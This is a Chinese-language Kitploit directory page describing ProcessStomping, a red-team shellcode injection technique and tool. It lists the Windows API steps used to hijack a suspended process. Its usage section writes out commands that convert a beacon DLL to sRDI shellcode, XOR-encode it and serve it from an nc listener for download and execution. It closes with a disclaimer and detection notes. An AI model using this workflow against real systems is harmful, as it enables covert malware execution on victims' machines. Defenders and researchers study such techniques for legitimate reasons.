Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ProcessStomping — ProcessOverwriting 的一种变体,用于在可执行文件的节区执行 shellcode。 | Kitploit
工具/GitHubGitHub/naksyn/processstomping
Shellcode后渗透利用学习与教育红队Payload 开发二进制利用
GitHubnaksyn/processstomping

ProcessStomping

ProcessOverwriting 的一种变体,用于在可执行文件的节区执行 shellcode。

查看仓库
14727122年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ProcessStomping

ProcessOverwriting 的一种变体,用于在可执行文件的节区上执行 shellcode

Twitter

这是什么

更详细的解释请参阅我的博客文章

Process Stomping 是 hasherezade 的 Process Overwriting 的一种变体,其优势在于将 shellcode 载荷写入目标节区,而不是将整个 PE 载荷写入宿主进程的地址空间。

以下是 ProcessStomping 技术的主要步骤:

  1. CreateProcess - 将进程创建标志设置为 CREATE_SUSPENDED (0x00000004) 以挂起进程的主线程。
  2. WriteProcessMemory - 用于将每个恶意 shellcode 写入目标进程节区。
  3. SetThreadContext - 用于将入口点指向其写入的新代码节区。
  4. ResumeThread - 不言自明。

作为该技术的一个示例应用,PoC 可与 sRDI 结合使用,将 beacon dll 加载到可执行文件的 RWX 节区上。下图描述了涉及的步骤。

图片

免责声明

所有信息及内容仅供教育用途。请自行承担风险遵循指示。作者及其雇主对任何个人或组织造成的直接或间接损害或损失概不负责。

致谢

本工作的完成得益于 Aleksandra Doniec @hasherezade 和 Nick Landers 分享的知识与工具。

用法

在 ProcessStomping.cpp 中选择目标进程并相应修改全局变量。

编译 sRDI 项目,确保偏移量足够跳过生成的 sRDI shellcode blob,然后更新 sRDI 工具:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

生成你选择的无反射加载器 dll 载荷,然后生成 sRDI shellcode blob:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

shellcode blob 随后可被异或一个关键词,并通过简单 socket 下载:

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

连接后传递异或后的 blob:

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

sRDI blob 会在执行后被清除,以移除不必要的痕迹。

演示

https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50

注意事项

要成功执行此技术,应选择合适的进程,并使用不含用户定义反射加载器的 dll 载荷。

检测机会

Process Stomping 技术需要以挂起状态启动目标进程,更改线程入口点,然后恢复线程以执行注入的 shellcode。这些操作如果快速连续执行,可能被视为可疑,并可能导致某些安全解决方案的加强审查。

下载工具